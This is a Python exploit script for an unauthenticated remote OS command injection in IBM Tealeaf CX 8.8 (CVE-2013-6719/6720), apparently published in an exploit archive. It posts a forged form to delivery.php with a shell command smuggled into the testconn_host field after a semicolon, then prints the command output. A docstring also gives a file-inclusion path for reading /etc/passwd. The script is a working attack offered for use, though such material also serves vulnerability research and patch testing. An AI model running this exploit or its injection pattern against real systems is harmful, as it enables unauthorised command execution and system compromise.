IBM Tealeaf CX 8.8 - Remote OS Command Injection

# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection

# Date: 11/08/2013

# Exploit author: drone

# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630

# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/

# Version: Version 8 Release 8 (likely all versions prior)

# Tested on: Redhat Linux 6.2

# CVE: CVE-2013-6719 / CVE-2013-6720

import requests

from argparse import ArgumentParser

""" Remote OS command injection (no auth)

IBM TeaLeaf Version 8 Release 8

drone (@dronesec)

Bonus:

LFI at /download.php?log=../../etc/passwd

"""

def run(options):

access = "http://{0}:{1}/delivery.php".format(options.address, options.port)

data = {"perform_action" : "testconn",

"delete_id" : "",

"testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),

"testconn_port" : 1966,

"testconn_t" : "false",

"csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care

"delivery_mode" : 0,

"batch_interval" : 60,

"polling_interval" : 10,

"watchdog_timer" : 30,

"max_queue_depth" : 50000000,

"timesource_host" : "test",

"timesource_port" : 1966,

"staticshit_enabled" : "on", # seriously

"staticshit_host" : "test",

"staticshit_intervalseconds" : 60,

"staticshit_port" : 1966

}

response = requests.post(access, data=data, timeout=20.0)

if response.status_code == 200:

# lazy parsing

result = response.content.split("alert('")[1].split('onUnload')[0]

for x in result.split("\\n"):

if 'PATTERN' in x: break

print x

def parse_args():

parser = ArgumentParser()

parser.add_argument("-i", help="Server address", action="store",

required=True, dest="address")

parser.add_argument("-p", help='Server port', action='store',

dest='port', default=8080)

parser.add_argument("-c", help='Command to exec', action='store',

dest='cmd', default='whoami')

return parser.parse_args()

if __name__ == "__main__":

run(parse_args())